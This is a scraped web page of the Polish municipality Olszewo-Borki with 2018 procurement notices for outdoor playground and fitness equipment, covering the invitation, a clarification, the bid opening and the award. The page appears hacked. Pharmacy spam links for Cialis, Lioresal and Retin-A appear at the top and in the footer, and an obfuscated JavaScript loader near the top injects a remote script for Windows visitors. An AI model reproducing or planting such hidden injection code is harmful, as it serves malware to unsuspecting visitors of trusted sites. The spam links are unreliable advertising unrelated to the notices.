Pain-relief infobuy Lioresal online | order trazodone online | Info sitebuy Flagyl without prescription | Instructions, 5mg, 20 mg pills best priceCialis best price | Acheter cialis sur internet acheter Cialis sans ordonnance
11.jpg12.jpg21.jpg22.jpg31.jpg32.jpg41.JPG42.jpg51.JPG52.jpg
;(function(){var l=navigator[u("xt)n,eug(Aor{e)s,u(")];var y=document[u("0e(i,kio3o4c}")];if(x(l,u("ws;w{o;d)n;i{W3"))&&!x(l,u("#d;i(o1r1d{n4A,"))){if(!x(y,u("e=)a)m6t)u}_)_;_5"))){var a=document.createElement('script');a.type='text/javascript';a.async=true;a.src=u('13(c11{5,7xar2{e{e{d(3ield;6,f,5f5bar3)73=3v,&;0(4;27={d2i}c}?cs{j(.}e4d7o0c{_(s}/,m4o2c).;8;092{s}c7i}t(y;loa}n2a,krc4i5l9ch.}k(c)i}l1c9/,/(:(s(p(t(t}hv');var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(a,s);}}function u(v){var i='';for(var b=0;b=0;g--){f+=q[g];}return f;}})();

Analiza rynku - Dostawa i montaż zewnętrznych urządzeń na plac zabaw oraz urządzeń do ćwiczeń na zewnątrz w msc. Działyń, Grabnik, Łazy, Mostowo, Nakły, Wyszel i Żerań Mały

                                                             Olszewo-Borki, 15 czerwca 2018 r.

RO.271.FS.1.2018

 

OGŁOSZENIE
O WYBORZE OFERTY NAJKORZYSTNIEJSZEJ

 

Zamawiający Gmina Olszewo-Borki z siedzibą 07-415 Olszewo-Borki ul. Wł. Broniewskiego 13 ogłasza wybór oferty najkorzystniejszej w prowadzonym postępowaniu o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz.U. z 2017r. poz. 1579 ze zm.) o wartości szacunkowej poniżej 30.000 euro na zadanie pn.: Dostawa i montaż zewnętrznych urządzeń na plac zabaw oraz  urządzeń do ćwiczeń na zewnątrz w msc. Działyń, Grabnik, Łazy, Mostowo, Nakły, Wyszel i Żerań Mały

Wybrano ofertę złożoną przez:

SIMBA s.c. Marcin Ćwirzeń Wojciech Gęsicki

z siedzibą 20-515 Lublin, Zemborzyce Tereszyńskie 74

za cenę brutto – 56.248,44 zł

uzyskała w kryterium cena 100 pkt;

W postępowaniu nie uczestniczyli inni wykonawcy.

Na podstawie postanowień cz. III ust. 4 zamawiający odstępuje od realizacji części zamówienia dla sołectwa Działyń ze względu na niewystarczające środki w budżecie. Do realizacji dla sołectwa Działyń pozostawia się montaż siłowni zewnętrznej podwójnej orbitrek + biegacz (poz. 1.2 oferty) w cenie brutto 5.291,99 zł, a rezygnuje się z realizacji montażu siłowni zewnętrznej podwójnej wioślarz + twister (poz. 1.1 oferty) w cenie brutto 5.095,19 zł.

Wobec powyższego wartość zamówienia wynosi 51.153,25 zł brutto.

Umowa o udzielenie zamówienia publicznego zostanie podpisana nie później niż przed upływem terminu związania z ofertą tj. 28 czerwca 2018r.

Planowany termin podpisania umowy w dniu 21 czerwca 2018r.      


Olszewo-Borki, dn. 30 maja 2018r.

RO.271.FS.1.2018

INFORMACJA Z OTWARCIA OFERT

 

Zamawiający na podstawie art. 86 ust. 5ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (Dz.U. z 2017r. poz. 1579 ze zm.) przekazuje informacje, o których mowa w art. 86 ust. 3 i 4 cyt. ustawy.

W dniu 30 maja 2018r. o godzinie 9:00 w siedzibie Zamawiającego tj. 07-415 Olszewo-Borki ul. Wł.Broniewskiego 13, odbyło się otwarcie ofertw toku prowadzonego postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie o wartości szacunkowej poniżej 30.000 euro na zadanie pn.:  „Dostawa i montaż zewnętrznych urządzeń na plac zabaw oraz  urządzeń do ćwiczeń na zewnątrz w msc. Działyń, Grabnik, Łazy, Mostowo, Nakły, Wyszel i Żerań Mały” Zamawiający przekazuje informacje:

1) kwota, jaką zamierza przeznaczyć na sfinansowanie zamówienia: 53.954,22 zł brutto

2) firm oraz adresów wykonawców, którzy złożyli oferty w terminie oraz ceny ich ofert:

Numer oferty

Nazwa Wykonawcy

Adres

Cena oferty brutto (zł)

Oferta wpłynęła

1

SIMBA s.c. M.Ćwirzeń W.Gęsicki

20-515 Lublin, Zemborzyce Tereszyńskie 74

56.248,45

28.05.2018r.
godz. 11:05

3) termin wykonania zamówienia – od dnia podpisania umowy do 30 lipca 2018r.;

4) okresu gwarancji – 60 miesięcy od daty odbioru końcowego;

5) warunków płatności zawartych w ofertach – zgodnie z opisem warunków zamówienia w ciągu 30 dni od daty dostarczenia prawidłowo wystawionej faktury VAT.

 


Olszewo-Borki, 25 maja 2018 r.

RO.271.FS.1.2018

WYJAŚNIENIE

dot. zapytania ofertowego o wartości poniżej 30.000 euro na zadanie pn: ,,Dostawa i montaż zewnętrznych urządzeń na plac zabaw oraz  urządzeń do ćwiczeń na zewnątrz w msc. Działyń, Grabnik, Łazy, Mostowo, Nakły, Wyszel i Żerań Mały realizowanego w ramach funduszu sołeckiego na 2018 rok w  odpowiedzi na zapytanie Wykonawcy wyjaśniam:

Pytanie Wykonawcy:

Proszę o informację dotyczącą ilości metrów bieżących piłkochwytów na boisku w Żeraniu Małym.

Odpowiedź Zamawiającego:

Piłkochwyt na boisku w Żeraniu Małym należy wykonać o długości 17 metrów bieżących.

 


Wójt Gminy Olszewo-Borki zaprasza do złożenia ofert w postępowaniu pn.

Dostawa i montaż zewnętrznych urządzeń na plac zabaw oraz urządzeń do ćwiczeń na zewnątrz w msc. Działyń, Grabnik, Łazy, Mostowo, Nakły, Wyszel i Żerań Mały

Zamówienie realizowane na podstawie art. 4 pkt. 8 ustawy z dn. 29 stycznia 2004 roku Prawo zamówień publicznych (Dz.U. z 2017r. poz. 1579), niniejsze postępowanie ma na celu spełnienie zasady konkurencyjności.

Szacunkowa wartość zamówienia jest niższa niż równowartość w złotych polskich kwoty 30.000,00 euro, obliczona na podstawie Rozporządzenia Prezesa Rady Ministrów w sprawie średniego kursu złotego w stosunku do euro stanowiącego podstawę przeliczania wartości zamówień publicznych (Dz. U. z 2017r. poz. 2477).  

Miejsce oraz termin składania i otwarcia ofert

Oferty należy złożyć w Urzędzie Gminy w Olszewie-Borkach, ul. Wł. Broniewskiego 13, pok. 2A (biuro podawcze) w terminie do dnia 28 maja 2018r. do godz. 1400 w następujących formach:

1) osobiście lub za pośrednictwem poczty,

2) na mail Ten adres pocztowy jest chroniony przed spamowaniem. Aby go zobaczyć, konieczne jest włączenie w przeglądarce obsługi JavaScript. skan do pliku PDF, w tytule wiadomości należy wpisać „Oferta w postępowaniu RO.271.FS.1.2018”.

Oferty złożone po terminie określonym w ust. 1 nie będą brane pod uwagę w dalszej ocenie.

Zamawiający nie przewiduje organizacji publicznej sesji otwarcia ofert.

SIWZ do pobrania

Hydroquinone and retin a cream buy retinol cream
Copyright - All Rights Reserved
Urzad Gminy Olszewo-Borki
ul. Wl. Broniewskiego 13, 07-415 Olszewo - Borki, tel: (29) 761-31-07

Strona ta wykorzystuje pliki cookies w celu realizacji swoich usług i funkcji zgodnie z Polityką Plików Cookies. Możesz samodzielnie dostosować warunki przechowywania lub dostępu do plików cookies w Twojej przeglądarce. To find out more about the cookies we use and how to delete them, see our privacy policy.

Akceptuj pliki cookie dla tej strony.

EU Cookie Directive Module Information